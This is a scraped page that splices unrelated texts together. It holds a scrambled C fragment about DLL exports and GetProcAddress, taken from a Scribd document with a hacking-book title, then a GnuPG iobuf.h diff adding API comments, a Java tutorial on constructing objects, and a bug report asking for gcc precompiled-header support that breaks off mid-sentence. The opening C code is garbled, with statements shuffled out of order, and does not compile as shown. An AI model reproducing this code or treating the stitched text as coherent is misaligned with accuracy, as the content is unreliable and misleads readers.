{ { GetModuleHandle("complex1.exe").\n"). } _declspec (dllexport) void func3() } _declspec (dllexport) void func4() printf("[4]: Tusaan sunhaa?\n").\n"). { { printf("[5]: Gahre aahle kutaanh hainn ggeyo?\n").\n")._declspec (dllexport) void func1() printf("[1]: Jaijeya!\n"). void (__cdecl *test) (void). char buffer[10]. strcpy(buffer. } _declspec (dllexport) void func7() printf("[7]: sab raazi-baazi hainn na?\n"). } _declspec (dllexport) void func8() printf("[8]: sunhaa kuchh noaa taaza. 335 .\n"). HMODULE hcomplex = { { { printf("[3]: Assaan taan raazi-khushi hainn. "func"). } _declspec (dllexport) void func9() } _declspec (dllexport) void func10() printf("[10]: amma-bappu kuthu hainn?\n"). } _declspec (dllexport) void func5() } _declspec (dllexport) void func6() printf("[6]: ajj mausam kharaa hai. char* argv[]) int random = 0. { { { { printf("[9]: Tusaan bade khare mahnhu hainn. } int main (int argc. } _declspec (dllexport) void func2() printf("[2]: Theek-thaak hainn na?\n").
memset(buffer. } } return EXIT_SUCCESS. } { Now add a . 0. EXECUTABLE DESCRIPTION EXPORTS func1 func2 func3 func4 func5 func6 func7 func8 func9 func10 "complex1" 'test program' 336 . sizeof(buffer)). ++random. "func%d". if (test != NULL) test(). for (int iter = 0. } Sleep(300).def file to the project complex1 containing following lines(Select Project->Add To Project->Files): .def : Defines exportable functions of complex1.if (hcomplex != NULL) printf("recieved handle\n"). sprintf(buffer. complex1. { { test = (void (__cdecl *) (void))GetProcAddress(hcomplex. iter++) random = randNS()%10. random). buffer). iter < 10.
now let use develop the above listed scenario in On-the-Fly way: 337 .The above code was enough warm up.
This action might not be possible to undo. Are you sure you want to continue?
We've moved you to where you read on your other device.
Get the full title to continue listening from where you left off, or restart the preview. | https://www.scribd.com/doc/51926549/%ED%8C%8C%EC%9B%8C%ED%95%B4%ED%82%B9%EC%B1%85 | CC-MAIN-2016-36 | refinedweb | 67,515 | 68.16 |
gpg: Disable compliance module for other GnuPG components.
[gnupg.git] / common / iobuf.h
diff --git a/common/iobuf.h b/common/iobuf.h
index 3a189c4..22e02da 100644
--- a/common/iobuf.h
+++ b/common/iobuf.h
@@ -2,39 +2,112 @@
* 2010 Free Software Foundation, Inc.
*
- * This file is part of GNUPG.
+ * This file is part of GnuPG.
*
- * GNUPG is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation; either version 3 of the License, or
- * (at your option) any later version.
+ * This file is free software; you can redistribute it and/or modify
+ * it under the terms of either
*
- * GNUPG is distributed in the hope that it will be useful,
+ * - <>.
+ * along with this program; if not, see <https://www.gnu.org/licenses/>.
*/
#ifndef GNUPG_COMMON_IOBUF_H
#define GNUPG_COMMON_IOBUF_H
-#include "../include/types.h" /* fixme: should be moved elsewhere. */
+/* An iobuf is basically a filter in a pipeline.
+
+ Consider the following command, which consists of three filters
+ that are chained together:
+
+ $ cat file | base64 --decode | gunzip
+
+ The first filter reads the file from the file system and sends that
+ data to the second filter. The second filter decodes
+ base64-encoded data and sends the data to the third and last
+ filter. The last filter decompresses the data and the result is
+ displayed on the terminal. The iobuf system works in the same way
+ where each iobuf is a filter and the individual iobufs can be
+ chained together.
+
+ There are number of predefined filters. iobuf_open(), for
+ instance, creates a filter that reads from a specified file. And,
+ iobuf_temp_with_content() creates a filter that returns some
+ specified contents. There are also filters for writing content.
+ iobuf_openrw opens a file for writing. iobuf_temp creates a filter
+ that writes data to a fixed-sized buffer.
+
+ To chain filters together, you use the iobuf_push_filter()
+ function. The filters are chained together using the chain field
+ in the iobuf_t.
+
+ A pipeline can only be used for reading (IOBUF_INPUT) or for
+ writing (IOBUF_OUTPUT / IOBUF_OUTPUT_TEMP). When reading, data
+ flows from the last filter towards the first. That is, the user
+ calls iobuf_read(), the module reads from the first filter, which
+ gets its input from the second filter, etc. When writing, data
+ flows from the first filter towards the last. In this case, when
+ the user calls iobuf_write(), the data is written to the first
+ filter, which writes the transformed data to the second filter,
+ etc.
+
+ An iobuf_t contains some state about the filter. For instance, it
+ indicates if the filter has already returned EOF (filter_eof) and
+ the next filter in the pipeline, if any (chain). It also contains
+ a function pointer, filter. This is a generic function. It is
+ called when input is needed or output is available. In this case
+ it is passed a pointer to some filter-specific persistent state
+ (filter_ov), the actual operation, the next filter in the chain, if
+ any, and a buffer that either contains the contents to write, if
+ the pipeline is setup to write data, or is the place to store data,
+ if the pipeline is setup to read data.
+
+
+ Unlike a Unix pipeline, an IOBUF pipeline can return EOF multiple
+ times. This is similar to the following:
+
+ { cat file1; cat file2; } | grep foo
+
+ However, instead of grep seeing a single stream, grep would see
+ each byte stream followed by an EOF marker. (When a filter returns
+ EOF, the EOF is returned to the user exactly once and then the
+ filter is removed from the pipeline.) */
+
+/* For estream_t. */
+#include <gpg-error.h>
+
+#include "../common/types.h"
#include "../common/sysutils.h"
-#include "../common/estream.h"
#define DBG_IOBUF iobuf_debug_mode
/* Filter control modes. */
-#define IOBUFCTRL_INIT 1
-#define IOBUFCTRL_FREE 2
-#define IOBUFCTRL_UNDERFLOW 3
-#define IOBUFCTRL_FLUSH 4
-#define IOBUFCTRL_DESC 5
-#define IOBUFCTRL_CANCEL 6
-#define IOBUFCTRL_USER 16
+enum
+ {
+ IOBUFCTRL_INIT = 1,
+ IOBUFCTRL_FREE = 2,
+ IOBUFCTRL_UNDERFLOW = 3,
+ IOBUFCTRL_FLUSH = 4,
+ IOBUFCTRL_DESC = 5,
+ IOBUFCTRL_CANCEL = 6,
+ IOBUFCTRL_USER = 16
+ };
/* Command codes for iobuf_ioctl. */
@@ -46,6 +119,25 @@ typedef enum
IOBUF_IOCTL_FSYNC = 4 /* Uses ptrval. */
} iobuf_ioctl_t;
+enum iobuf_use
+ {
+ /* Pipeline is in input mode. The data flows from the end to the
+ beginning. That is, when reading from the pipeline, the first
+ filter gets its input from the second filter, etc. */
+ IOBUF_INPUT,
+ /* Pipeline is in input mode. The last filter in the pipeline is
+ a temporary buffer from which the data is "read". */
+ IOBUF_INPUT_TEMP,
+ /* Pipeline is in output mode. The data flows from the beginning
+ to the end. That is, when writing to the pipeline, the user
+ writes to the first filter, which transforms the data and sends
+ it to the second filter, etc. */
+ IOBUF_OUTPUT,
+ /* Pipeline is in output mode. The last filter in the pipeline is
+ a temporary buffer that grows as necessary. */
+ IOBUF_OUTPUT_TEMP
+ };
+
typedef struct iobuf_struct *iobuf_t;
typedef struct iobuf_struct *IOBUF; /* Compatibility with gpg 1.4. */
@@ -53,35 +145,108 @@ typedef struct iobuf_struct *IOBUF; /* Compatibility with gpg 1.4. */
/* fixme: we should hide most of this stuff */
struct iobuf_struct
{
- int use; /* 1 input , 2 output, 3 temp */
+ /* The type of filter. Either IOBUF_INPUT, IOBUF_OUTPUT or
+ IOBUF_OUTPUT_TEMP. */
+ enum iobuf_use use;
+
+ /* nlimit can be changed using iobuf_set_limit. If non-zero, it is
+ the number of additional bytes that can be read from the filter
+ before EOF is forcefully returned. */
off_t nlimit;
- off_t nbytes; /* Used together with nlimit. */
- off_t ntotal; /* Total bytes read (position of stream). */
- int nofast; /* Used by the iobuf_get (). */
- void *directfp;
+ /* nbytes if the number of bytes that have been read (using
+ iobuf_get / iobuf_readbyte / iobuf_read) since the last call to
+ iobuf_set_limit. */
+ off_t nbytes;
+
+ /* The number of bytes read prior to the last call to
+ iobuf_set_limit. Thus, the total bytes read (i.e., the position
+ of stream) is ntotal + nbytes. */
+ off_t ntotal;
+
+ /* Whether we need to read from the filter one byte at a time or
+ whether we can do bulk reads. We need to read one byte at a time
+ if a limit (set via iobuf_set_limit) is active. */
+ int nofast;
+
+ /* A buffer for unread/unwritten data.
+
+ For an output pipeline (IOBUF_OUTPUT), this is the data that has
+ not yet been written to the filter. Consider a simple pipeline
+ consisting of a single stage, which writes to a file. When you
+ write to the pipeline (iobuf_writebyte or iobuf_write), the data
+ is first stored in this buffer. Only when the buffer is full or
+ you call iobuf_flush() is FILTER actually called and the data
+ written to the file.
+
+ For an input pipeline (IOBUF_INPUT), this is the data that has
+ been read from this filter, but not yet been read from the
+ preceding filter (or the user, if this filter is the head of the
+ pipeline). Again, consider a simple pipeline consisting of a
+ single stage. This stage reads from a file. If you read a
+ single byte (iobuf_get) and the buffer is empty, then FILTER is
+ called to fill the buffer. In this case, a single byte is not
+ requested, but the whole buffer is filled (if possible). */
struct
{
- size_t size; /* Allocated size */
- size_t start; /* Number of invalid bytes at the
- begin of the buffer */
- size_t len; /* Currently filled to this size */
+ /* Size of the buffer. */
+ size_t size;
+ /* Number of bytes at the beginning of the buffer that have
+ already been consumed. (In other words: the index of the first
+ byte that hasn't been consumed.) This is only non-zero for
+ input filters. */
+ size_t start;
+ /* The number of bytes in the buffer including any bytes that have
+ been consumed. */
+ size_t len;
+ /* The buffer itself. */
byte *buf;
} d;
+ /* When FILTER is called to read some data, it may read some data
+ and then return EOF. We can't return the EOF immediately.
+ Instead, we note that we observed the EOF and when the buffer is
+ finally empty, we return the EOF. */
int filter_eof;
+ /* Like filter_eof, when FILTER is called to read some data, it may
+ read some data and then return an error. We can't return the
+ error (in the form of an EOF) immediately. Instead, we note that
+ we observed the error and when the buffer is finally empty, we
+ return the EOF. */
int error;
+
+ /* The callback function to read data from the filter, etc. See
+ iobuf_filter_push for details. */
int (*filter) (void *opaque, int control,
iobuf_t chain, byte * buf, size_t * len);
- void *filter_ov; /* Value for opaque */
+ /* An opaque pointer that can be used for local filter state. This
+ is passed as the first parameter to FILTER. */
+ void *filter_ov;
+ /* Whether the iobuf code should free(filter_ov) when destroying the
+ filter. */
int filter_ov_owner;
+
+ /* When using iobuf_open, iobuf_create, iobuf_openrw to open a file,
+ the file's name is saved here. This is used to delete the file
+ when an output pipeline (IOBUF_OUTPUT) is canceled
+ (iobuf_cancel). */
char *real_fname;
- iobuf_t chain; /* Next iobuf used for i/o if any
- (passed to filter) */
- int no, subno;
- const char *desc;
- void *opaque; /* Can be used to hold any information
- this value is copied to all
- instances */
+
+ /* The next filter in the pipeline. */
+ iobuf_t chain;
+
+ /* This field is for debugging. Each time a filter is allocated
+ (via iobuf_alloc()), a monotonically increasing counter is
+ incremented and this field is set to the new value. This field
+ should only be accessed via the iobuf_id macro. */
+ int no;
+
+ /* The number of filters in the pipeline following (not including)
+ this one. When you call iobuf_push_filter or iobuf_push_filter2,
+ this value is used to check the length of the pipeline: if the
+ pipeline already contains 65 stages, then these functions fail.
+ This amount of nesting typically indicates corrupted data or an
+ active denial of service attack. */
+ int subno;
};
#ifndef EXTERN_UNLESS_MAIN_MODULE
@@ -93,88 +258,365 @@ struct iobuf_struct
#endif
EXTERN_UNLESS_MAIN_MODULE int iobuf_debug_mode;
-void iobuf_enable_special_filenames (int yes);
+
+/* Returns whether the specified filename corresponds to a pipe. In
+ particular, this function checks if FNAME is "-" and, if special
+ filenames are enabled (see check_special_filename), whether
+ FNAME is a special filename. */
int iobuf_is_pipe_filename (const char *fname);
+
+/* Allocate a new filter. This filter doesn't have a function
+ assigned to it. Thus you need to manually set IOBUF->FILTER and
+ IOBUF->FILTER_OV, if required. This function is intended to help
+ create a new primary source or primary sink, i.e., the last filter
+ in the pipeline.
+
+ USE is IOBUF_INPUT, IOBUF_INPUT_TEMP, IOBUF_OUTPUT or
+ IOBUF_OUTPUT_TEMP.
+
+ BUFSIZE is the desired internal buffer size (that is, the size of
+ the typical read / write request). */
iobuf_t iobuf_alloc (int use, size_t bufsize);
+
+/* Create an output filter that simply buffers data written to it.
+ This is useful for collecting data for later processing. The
+ buffer can be written to in the usual way (iobuf_write, etc.). The
+ data can later be extracted using iobuf_write_temp() or
+ iobuf_temp_to_buffer(). */
iobuf_t iobuf_temp (void);
+
+/* Create an input filter that contains some data for reading. */
iobuf_t iobuf_temp_with_content (const char *buffer, size_t length);
-iobuf_t iobuf_open_fd_or_name (gnupg_fd_t fd, const char *fname,
- const char *mode);
+
+/* Create an input file filter that reads from a file. If FNAME is
+ '-', reads from stdin. If special filenames are enabled
+ (iobuf_enable_special_filenames), then interprets special
+ filenames. */
iobuf_t iobuf_open (const char *fname);
+
+/* Create an output file filter that writes to a file. If FNAME is
+ NULL or '-', writes to stdout. If special filenames are enabled
+ (iobuf_enable_special_filenames), then interprets special
+ filenames. If FNAME is not NULL, '-' or a special filename, the
+ file is opened for writing. If the file exists, it is truncated.
+ If MODE700 is TRUE, the file is created with mode 600. Otherwise,
+ mode 666 is used. */
+iobuf_t iobuf_create (const char *fname, int mode700);
+
+/* Create an output file filter that writes to a specified file.
+ Neither '-' nor special file names are recognized. */
+iobuf_t iobuf_openrw (const char *fname);
+
+/* Create a file filter using an existing file descriptor. If MODE
+ contains the letter 'w', creates an output filter. Otherwise,
+ creates an input filter. Note: MODE must reflect the file
+ descriptor's actual mode! When the filter is destroyed, the file
+ descriptor is closed. */
iobuf_t iobuf_fdopen (int fd, const char *mode);
+
+/* Like iobuf_fdopen, but doesn't close the file descriptor when the
+ filter is destroyed. */
iobuf_t iobuf_fdopen_nc (int fd, const char *mode);
+
+/* Create a filter using an existing estream. If MODE contains the
+ letter 'w', creates an output filter. Otherwise, creates an input
+ filter. If KEEP_OPEN is TRUE, then the stream is not closed when
+ the filter is destroyed. Otherwise, the stream is closed when the
+ filter is destroyed. */
iobuf_t iobuf_esopen (estream_t estream, const char *mode, int keep_open);
+
+/* Create a filter using an existing socket. On Windows creates a
+ special socket filter. On non-Windows systems, this simply
+ calls iobuf_fdopen. */
iobuf_t iobuf_sockopen (int fd, const char *mode);
-iobuf_t iobuf_create (const char *fname);
-iobuf_t iobuf_append (const char *fname);
-iobuf_t iobuf_openrw (const char *fname);
+
+/* Set various options / perform different actions on a PIPELINE. See
+ the IOBUF_IOCTL_* macros above. */
int iobuf_ioctl (iobuf_t a, iobuf_ioctl_t cmd, int intval, void *ptrval);
+
+/* Close a pipeline. The filters in the pipeline are first flushed
+ using iobuf_flush, if they are output filters, and then
+ IOBUFCTRL_FREE is called on each filter.
+
+ If any filter returns a non-zero value in response to the
+ IOBUFCTRL_FREE, the first such non-zero value is returned. Note:
+ processing is not aborted in this case. If all filters are freed
+ successfully, 0 is returned. */
int iobuf_close (iobuf_t iobuf);
+
+/* Calls IOBUFCTRL_CANCEL on each filter in the pipeline. Then calls
+ iobuf_close() on the pipeline. Finally, if the pipeline is an output
+ pipeline, deletes the file. Returns the result of calling
+ iobuf_close on the pipeline. */
int iobuf_cancel (iobuf_t iobuf);
+/* Add a new filter to the front of a pipeline. A is the head of the
+ pipeline. F is the filter implementation. OV is an opaque pointer
+ that is passed to F and is normally used to hold any internal
+ state, such as a file pointer.
+
+ Note: you may only maintain a reference to an iobuf_t as a
+ reference to the head of the pipeline. That is, don't think about
+ setting a pointer in OV to point to the filter's iobuf_t. This is
+ because when we add a new filter to a pipeline, we memcpy the state
+ in A into new buffer. This has the advantage that there is no need
+ to update any references to the pipeline when a filter is added or
+ removed, but it also means that a filter's state moves around in
+ memory.
+
+ The behavior of the filter function is determined by the value of
+ the control parameter:
+
+ IOBUFCTRL_INIT: Called with this value just before the filter is
+ linked into the pipeline. This can be used to initialize
+ internal data structures.
+
+ IOBUFCTRL_FREE: Called with this value just before the filter is
+ removed from the pipeline. Normally used to release internal
+ data structures, close a file handle, etc.
+
+ IOBUFCTRL_UNDERFLOW: Called with this value to fill the passed
+ buffer with more data. *LEN is the size of the buffer. Before
+ returning, it should be set to the number of bytes which were
+ written into the buffer. The function must return 0 to
+ indicate success, -1 on EOF and a GPG_ERR_xxxxx code for any
+ error.
+
+ Note: this function may both return data and indicate an error
+ or EOF. In this case, it simply writes the data to BUF, sets
+ *LEN and returns the appropriate return code. The implication
+ is that if an error occurs and no data has yet been written, it
+ is essential that *LEN be set to 0!
+
+ IOBUFCTRL_FLUSH: Called with this value to write out any
+ collected data. *LEN is the number of bytes in BUF that need
+ to be written out. Returns 0 on success and a GPG_ERR_* code
+ otherwise. *LEN must be set to the number of bytes that were
+ written out.
+
+ IOBUFCTRL_CANCEL: Called with this value when iobuf_cancel() is
+ called on the pipeline.
+
+ IOBUFCTRL_DESC: Called with this value to get a human-readable
+ description of the filter. *LEN is the size of the buffer.
+ The description is filled into BUF, NUL-terminated. Always
+ returns 0.
+ */
int iobuf_push_filter (iobuf_t a, int (*f) (void *opaque, int control,
- iobuf_t chain, byte * buf,
- size_t * len), void *ov);
+ iobuf_t chain, byte * buf,
+ size_t * len), void *ov);
+/* This variant of iobuf_push_filter allows the caller to indicate
+ that OV should be freed when this filter is freed. That is, if
+ REL_OV is TRUE, then when the filter is popped or freed OV will be
+ freed after the filter function is called with control set to
+ IOBUFCTRL_FREE. */
int iobuf_push_filter2 (iobuf_t a,
int (*f) (void *opaque, int control, iobuf_t chain,
byte * buf, size_t * len), void *ov,
int rel_ov);
-int iobuf_flush (iobuf_t a);
-void iobuf_clear_eof (iobuf_t a);
+
+/* Pop the top filter. The top filter must have the filter function F
+ and the cookie OV. The cookie check is ignored if OV is NULL. */
+int iobuf_pop_filter (iobuf_t a,
+ int (*f) (void *opaque, int control,
+ iobuf_t chain, byte * buf, size_t * len),
+ void *ov);
+
+/* Used for debugging. Prints out the chain using log_debug if
+ IOBUF_DEBUG_MODE is not 0. */
+int iobuf_print_chain (iobuf_t a);
+
+/* Indicate that some error occurred on the specified filter. */
#define iobuf_set_error(a) do { (a)->error = 1; } while(0)
+
+/* Return any pending error on filter A. */
#define iobuf_error(a) ((a)->error)
+/* Limit the amount of additional data that may be read from the
+ filter. That is, if you've already read 100 bytes from A and you
+ set the limit to 50, then you can read up to an additional 50 bytes
+ (i.e., a total of 150 bytes) before EOF is forcefully returned.
+ Setting NLIMIT to 0 removes any active limit.
+
+ Note: using iobuf_seek removes any currently enforced limit! */
void iobuf_set_limit (iobuf_t a, off_t nlimit);
+/* Returns the number of bytes that have been read from the pipeline.
+ Note: the result is undefined for IOBUF_OUTPUT and IOBUF_OUTPUT_TEMP
+ pipelines! */
off_t iobuf_tell (iobuf_t a);
+
+/* There are two cases:
+
+ - If A is an INPUT or OUTPUT pipeline, then the last filter in the
+ pipeline is found. If that is not a file filter, -1 is returned.
+ Otherwise, an fseek(..., SEEK_SET) is performed on the file
+ descriptor.
+
+ - If A is a TEMP pipeline and the *first* (and thus only filter) is
+ a TEMP filter, then the "file position" is effectively unchanged.
+ That is, data is appended to the buffer and the seek does not
+ cause the size of the buffer to grow.
+
+ If no error occurred, then any limit previously set by
+ iobuf_set_limit() is cleared. Further, any error on the filter
+ (the file filter or the temp filter) is cleared.
+
+ Returns 0 on success and -1 if an error occurs. */
int iobuf_seek (iobuf_t a, off_t newpos);
+/* Read a single byte. If a filter has no more data, returns -1 to
+ indicate the EOF. Generally, you don't want to use this function,
+ but instead prefer the iobuf_get macro, which is faster if there is
+ data in the internal buffer. */
int iobuf_readbyte (iobuf_t a);
+
+
+/* Get a byte from the iobuf; must check for eof prior to this
+ function. This function returns values in the range 0 .. 255 or -1
+ to indicate EOF. iobuf_get_noeof() does not return -1 to indicate
+ EOF, but masks the returned value to be in the range 0 .. 255. */
+/* Fill BUF with up to BUFLEN bytes. If a filter has no more data,
+ returns -1 to indicate the EOF. Otherwise returns the number of
+ bytes read. */
int iobuf_read (iobuf_t a, void *buf, unsigned buflen);
-void iobuf_unread (iobuf_t a, const unsigned char *buf, unsigned int buflen);
+
+/* Read a line of input (including the '\n') from the pipeline.
+
+ The semantics are the same as for fgets(), but if the buffer is too
+ short a larger one will be allocated up to *MAX_LENGTH and the end
+ of the line except the trailing '\n' discarded. (Thus,
+ *ADDR_OF_BUFFER must be allocated using malloc().) If the buffer
+ is enlarged, then *LENGTH_OF_BUFFER will be updated to reflect the
+ new size. If the line is truncated, then *MAX_LENGTH will be set
+ to 0. If *ADDR_OF_BUFFER is NULL, a buffer is allocated using
+ malloc().
+
+ A line is considered a byte stream ending in a '\n'. Returns the
+ number of characters written to the buffer (i.e., excluding any
+ discarded characters due to truncation). Thus, use this instead of
+ strlen(buffer) to determine the length of the string as this is
+ unreliable if the input contains NUL characters.
+
+ EOF is indicated by a line of length zero.
+
+ The last LF may be missing due to an EOF. */
unsigned iobuf_read_line (iobuf_t a, byte ** addr_of_buffer,
unsigned *length_of_buffer, unsigned *max_length);
+
+/* Read up to BUFLEN bytes from pipeline A. Note: this function can't
+ return more than the pipeline's internal buffer size. The return
+ value is the number of bytes actually written to BUF. If the
+ filter returns EOF, then this function returns -1.
+
+ This function does not clear any pending EOF. That is, if the
+ pipeline consists of two filters and the first one returns EOF
+ during the peek, then the subsequent iobuf_read* will still return
+ EOF before returning the data from the second filter. */
int iobuf_peek (iobuf_t a, byte * buf, unsigned buflen);
+
+/* Write a byte to the pipeline. Returns 0 on success and an error
+ code otherwise. */
int iobuf_writebyte (iobuf_t a, unsigned c);
+
+/* Alias for iobuf_writebyte. */
+#define iobuf_put(a,c) iobuf_writebyte(a,c)
+
+/* Write a sequence of bytes to the pipeline. Returns 0 on success
+ and an error code otherwise. */
int iobuf_write (iobuf_t a, const void *buf, unsigned buflen);
+
+/* Write a string (not including the NUL terminator) to the pipeline.
+ Returns 0 on success and an error code otherwise. */
int iobuf_writestr (iobuf_t a, const char *buf);
+/* Flushes the pipeline removing all filters but the sink (the last
+ filter) in the process. */
void iobuf_flush_temp (iobuf_t temp);
-int iobuf_write_temp (iobuf_t a, iobuf_t temp);
+
+/* Flushes the pipeline SOURCE removing all filters but the sink (the
+ last filter) in the process (i.e., it calls
+ iobuf_flush_temp(source)) and then writes the data to the pipeline
+ DEST. Note: this doesn't free (iobuf_close()) SOURCE. Both SOURCE
+ and DEST must be output pipelines. */
+int iobuf_write_temp (iobuf_t dest, iobuf_t source);
+
+/* Flushes each filter in the pipeline (i.e., sends any buffered data
+ to the filter by calling IOBUFCTRL_FLUSH). Then, copies up to the
+ first BUFLEN bytes from the last filter's internal buffer (which
+ will only be non-empty if it is a temp filter) to the buffer
+ BUFFER. Returns the number of bytes actually copied. */
size_t iobuf_temp_to_buffer (iobuf_t a, byte * buffer, size_t buflen);
+/* Copies the data from the input iobuf SOURCE to the output iobuf
+ DEST until either an error is encountered or EOF is reached.
+ Returns the number of bytes successfully written. If an error
+ occurred, then any buffered bytes are not returned to SOURCE and are
+ effectively lost. To check if an error occurred, use
+ iobuf_error. */
+size_t iobuf_copy (iobuf_t dest, iobuf_t source);
+
+/* Return the size of any underlying file. This only works with
+ file_filter based pipelines.
+
+ On Win32, it is sometimes not possible to determine the size of
+ files larger than 4GB. In this case, *OVERFLOW (if not NULL) is
+ set to 1. Otherwise, *OVERFLOW is set to 0. */
off_t iobuf_get_filelength (iobuf_t a, int *overflow);
#define IOBUF_FILELENGTH_LIMIT 0xffffffff
+
+/* Return the file descriptor designating the underlying file. This
+ only works with file_filter based pipelines. */
int iobuf_get_fd (iobuf_t a);
+
+/* Return the real filename, if available. This only supports
+ pipelines that end in file filters. Returns NULL if not
+ available. */
const char *iobuf_get_real_fname (iobuf_t a);
+
+/* Return the filename or a description thereof. For instance, for
+ iobuf_open("-"), this will return "[stdin]". This only supports
+ pipelines that end in file filters. Returns NULL if not
+ available. */
const char *iobuf_get_fname (iobuf_t a);
-const char *iobuf_get_fname_nonnull (iobuf_t a);
-void iobuf_set_partial_block_mode (iobuf_t a, size_t len);
+/* Like iobuf_get_fname, but instead of returning NULL if no
+ description is available, return "[?]". */
+const char *iobuf_get_fname_nonnull (iobuf_t a);
-void iobuf_skip_rest (iobuf_t a, unsigned long n, int partial);
+/* Pushes a filter on the pipeline that interprets the datastream as
+ an OpenPGP data block whose length is encoded using partial body
+ length headers (see Section 4.2.2.4 of RFC 4880). Concretely, it
+ just returns / writes the data and finishes the packet with an
+ EOF. */
+void iobuf_set_partial_body_length_mode (iobuf_t a, size_t len);
+/* If PARTIAL is set, then read from the pipeline until the first EOF
+ is returned.
-/*)
+ If PARTIAL is 0, then read up to N bytes or until the first EOF is
+ returned.
-/* write a byte to the iobuf and return true on write error
- * This macro does only write the low order byte
- */
-#define iobuf_put(a,c) iobuf_writebyte(a,c)
+ Recall: a filter can return EOF. In this case, it and all
+ preceding filters are popped from the pipeline and the next read is
+ from the following filter (which may or may not return EOF). */
+void iobuf_skip_rest (iobuf_t a, unsigned long n, int partial);
#define iobuf_where(a) "[don't know]"
+
+/* Each time a filter is allocated (via iobuf_alloc()), a
+ monotonically increasing counter is incremented and this field is
+ set to the new value. This macro returns that number. */
#define iobuf_id(a) ((a)->no)
#define iobuf_get_temp_buffer(a) ( (a)->d.buf )
#define iobuf_get_temp_length(a) ( (a)->d.len )
-#define iobuf_is_temp(a) ( (a)->use == 3 )
+
+/* Whether the filter uses an in-memory buffer. */
+#define iobuf_is_temp(a) ( (a)->use == IOBUF_OUTPUT_TEMP )
#endif /*GNUPG_COMMON_IOBUF_H*/
The GNU Privacy Guard
As you know, a class provides the blueprint for objects; you create an object from a class. Each of the following statements taken from the
CreateObjectDemo program creates an object and assigns it to a variable:
Point originOne = new Point(23, 94);
Rectangle rectOne = new Rectangle(originOne, 100, 200);
Rectangle rectTwo = new Rectangle(50, 100);
The first line creates an object of the
Point class, and the second and third lines each create an object of the
Rectangle class.
Each of these statements has three parts (discussed in detail below):

1. Declaration: the code that associates a variable name with an object type.
2. Instantiation: the new keyword is a Java operator that creates the object.
3. Initialization: the new operator is followed by a call to a constructor, which initializes the new object.
Previously, you learned that to declare a variable, you write:
type name;
This notifies the compiler that you will use name to refer to data whose type is type. With a primitive variable, this declaration also reserves the proper amount of memory for the variable.
You can also declare a reference variable on its own line. For example:
Point originOne;
If you declare
originOne like this, its value will be undetermined until an object is actually created and assigned to it. Simply declaring a reference variable does not create an object. For that, you need to use the
new operator, as described in the next section. You must assign an object to
originOne before you use it in your code. Otherwise, you will get a compiler error.
A variable in this state, which currently references no object, can be illustrated as follows (the variable name,
originOne, plus a reference pointing to nothing):
The new operator instantiates a class by allocating memory for a new object and returning a reference to that memory. The new operator also invokes the object constructor; it requires a single, postfix argument: a call to a constructor. For example:
Point originOne = new Point(23, 94);
The reference returned by the new operator does not have to be assigned to a variable. It can also be used directly in an expression. For example:
int height = new Rectangle().height;
This statement will be discussed in the next section.
Here's the code for the Point class:
public class Point {
    public int x = 0;
    public int y = 0;

    // constructor
    public Point(int a, int b) {
        x = a;
        y = b;
    }
}
This class contains a single constructor. You can recognize a constructor because its declaration uses the same name as the class and it has no return type. The constructor in the Point class takes two integer arguments, as declared by the code (int a, int b). The following statement provides 23 and 94 as values for those arguments:
Point originOne = new Point(23, 94);
The result of executing this statement can be illustrated in the next figure:
Here's the code for the Rectangle class, which contains four constructors:

public class Rectangle {
    public int width = 0;
    public int height = 0;
    public Point origin;

    // four constructors
    public Rectangle() {
        origin = new Point(0, 0);
    }
    public Rectangle(Point p) {
        origin = p;
    }
    public Rectangle(int w, int h) {
        origin = new Point(0, 0);
        width = w;
        height = h;
    }
    public Rectangle(Point p, int w, int h) {
        origin = p;
        width = w;
        height = h;
    }
}
Each constructor lets you provide initial values for the rectangle's origin, width, and height, using both primitive and reference types. For example:
Rectangle rectOne = new Rectangle(originOne, 100, 200);
This calls one of
Rectangle's constructors that initializes
origin to
originOne. Also, the constructor sets
width to 100 and
height to 200. Now there are two references to the same Point object; an object can have multiple references to it, as shown in the next figure:
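The figure itself isn't reproduced here, but the aliasing it illustrates can be checked directly in code. A minimal runnable sketch (Point is the tutorial's class trimmed to what's used; the demo class name is made up):

```java
// Two variables referencing one and the same Point object.
class Point {
    public int x = 0;
    public int y = 0;

    public Point(int a, int b) {
        x = a;
        y = b;
    }
}

public class ReferenceDemo {
    public static void main(String[] args) {
        Point originOne = new Point(23, 94);
        Point alias = originOne;   // no new object: just a second reference

        alias.x = 50;              // mutate through one reference...
        System.out.println(originOne.x == 50); // ...the other sees it: prints true
    }
}
```

Because both variables refer to the same object, a change made through either reference is visible through the other.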
The following line of code calls the
Rectangle constructor that requires two integer arguments, which provide the initial values for width and height. If you inspect the code within the constructor, you will see that it creates a new Point object whose x and y values are initialized to 0:
Rectangle rectTwo = new Rectangle(50, 100);
The Rectangle constructor used in the following statement doesn't take any arguments, so it's called a no-argument constructor:
Rectangle rect = new Rectangle();
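To make the no-argument case concrete, here is a runnable sketch; the Rectangle below is a hypothetical minimal version containing only the fields and the no-argument constructor discussed above:

```java
// Minimal Point/Rectangle pair to show what a no-argument constructor yields.
class Point {
    public int x = 0;
    public int y = 0;

    public Point(int a, int b) {
        x = a;
        y = b;
    }
}

class Rectangle {
    public int width = 0;
    public int height = 0;
    public Point origin;

    // no-argument constructor: origin defaults to (0, 0)
    public Rectangle() {
        origin = new Point(0, 0);
    }
}

public class NoArgDemo {
    public static void main(String[] args) {
        Rectangle rect = new Rectangle();
        // Every value falls back to its default:
        System.out.println(rect.width);    // prints 0
        System.out.println(rect.height);   // prints 0
        System.out.println(rect.origin.x); // prints 0
    }
}
```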
Implement extended support of precompile headers with gcc pls.
what I need:
- some option in project properties (like switch on/off)
- creation of makefiles (build precompile headers (.h .hpp ...) first then object files (.c .cpp ...))
Result:
- a change in one header file leads to a rebuild of the dependent .cpp files
This link may help to understand how it all works in gcc:
You have a plug-in for showing C++ header dependencies - it may just be helpful for the implementation.
Please evaluate
+1 vote (where's the vote button???).
Additionally, allow us to choose the PCH filename.
Also, have a look at how Borland (Embarcadero) implements their PCH.
(In reply to comment #2)
> +1 vote (where's the vote button???).
Ctrl-F and you can find "Priority: P2 with 3 votes (vote)" text
You can use the following workaround to get precompiled headers.
For GNU compiler:
Option #1 (precompiled headers will be created whenever you like):
1. Go to the properties of the header file you want to precompile (select Properties from its context menu).
2. Go to the Custom Build Step category and set Compile Line (e.g., gcc -c -g -Wall myheader.h) and Outputs (e.g., myheader.h.pch).
